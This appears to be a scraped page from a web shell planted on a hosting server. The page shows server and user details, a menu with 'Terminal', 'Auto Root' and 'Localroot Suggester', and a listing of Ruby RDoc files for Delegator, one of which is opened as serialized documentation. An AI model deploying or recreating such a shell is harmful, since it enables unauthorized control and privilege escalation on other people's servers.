Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
Delegator /
Delete
Unzip
Name
Size
Permission
Date
Action
%21%3d-i.ri
244
B
-rw-r--r--
2023-07-26 17:26
%21-i.ri
139
B
-rw-r--r--
2023-07-26 17:26
%3d%3d-i.ri
240
B
-rw-r--r--
2023-07-26 17:26
__getobj__-i.ri
311
B
-rw-r--r--
2023-07-26 17:26
__setobj__-i.ri
289
B
-rw-r--r--
2023-07-26 17:26
cdesc-Delegator.ri
2.24
KB
-rw-r--r--
2023-07-26 17:26
delegating_block-c.ri
173
B
-rw-r--r--
2023-07-26 17:26
freeze-i.ri
246
B
-rw-r--r--
2023-07-26 17:26
marshal_dump-i.ri
263
B
-rw-r--r--
2023-07-26 17:26
marshal_load-i.ri
253
B
-rw-r--r--
2023-07-26 17:26
method_missing-i.ri
274
B
-rw-r--r--
2023-07-26 17:26
methods-i.ri
306
B
-rw-r--r--
2023-07-26 17:26
new-c.ri
291
B
-rw-r--r--
2023-07-26 17:26
protected_methods-i.ri
344
B
-rw-r--r--
2023-07-26 17:26
public_methods-i.ri
335
B
-rw-r--r--
2023-07-26 17:26
respond_to_missing%3f-i.ri
340
B
-rw-r--r--
2023-07-26 17:26
taint-i.ri
243
B
-rw-r--r--
2023-07-26 17:26
trust-i.ri
243
B
-rw-r--r--
2023-07-26 17:26
untaint-i.ri
249
B
-rw-r--r--
2023-07-26 17:26
untrust-i.ri
249
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::NormalClass[iI"Delegator:EF@I"BasicObject;Fo:RDoc::Markup::Document:@parts[o;;[o:RDoc::Markup::Paragraph;[ I"NThis library provides three different ways to delegate method calls to an;TI"Kobject. The easiest to use is SimpleDelegator. Pass an object to the;TI"Qconstructor and all methods supported by the object will be delegated. This;TI"!object can be changed later.;To:RDoc::Markup::BlankLine o; ;[I"RGoing a step further, the top level DelegateClass method allows you to easily;TI"Ksetup delegation through class inheritance. This is considerably more;TI"Eflexible and thus probably the most common use for this library.;T@o; ;[ I"RFinally, if you need full control over the delegation scheme, you can inherit;TI"Mfrom the abstract class Delegator and customize as needed. (If you find;TI"Oyourself needing this control, have a look at Forwardable which is also in;TI";the standard library. It may suit your needs better.);T@o; ;[I"LSimpleDelegator's implementation serves as a nice example if the use of;TI"Delegator:;T@o:RDoc::Markup::Verbatim;[I"'class SimpleDelegator < Delegator ;FI" def initialize(obj) ;FI"N super # pass obj to Delegator constructor, required ;FI"; @delegate_sd_obj = obj # store obj for future use ;FI" end ;FI" ;FI" def __getobj__ ;FI"I @delegate_sd_obj # return object we are delegating to, required ;FI" end ;FI" ;FI" def __setobj__(obj) ;FI"< @delegate_sd_obj = obj # change delegation object, ;FI"< # a feature we're providing ;FI" end ;FI" end ;FS:RDoc::Markup::Heading: leveli: textI" Notes;T@o; ;[I"8Be advised, RDoc will not detect delegated methods.;T: @fileI"lib/delegate.rb;T;0[ [ [ [[I" class;F[[:public[[I"delegating_block;F@9[I"new;F@9[:protected[ [:private[ [I" instance;F[[;[[I"!;F@9[I"!=;F@9[I"==;F@9[I"__getobj__;F@9[I"__setobj__;F@9[I"freeze;T@9[I"marshal_dump;F@9[I"marshal_load;F@9[I"method_missing;F@9[I"methods;F@9[I"protected_methods;F@9[I"public_methods;F@9[I"respond_to_missing?;F@9[I" taint;T@9[I" trust;T@9[I"untaint;T@9[I"untrust;T@9[;[ [;[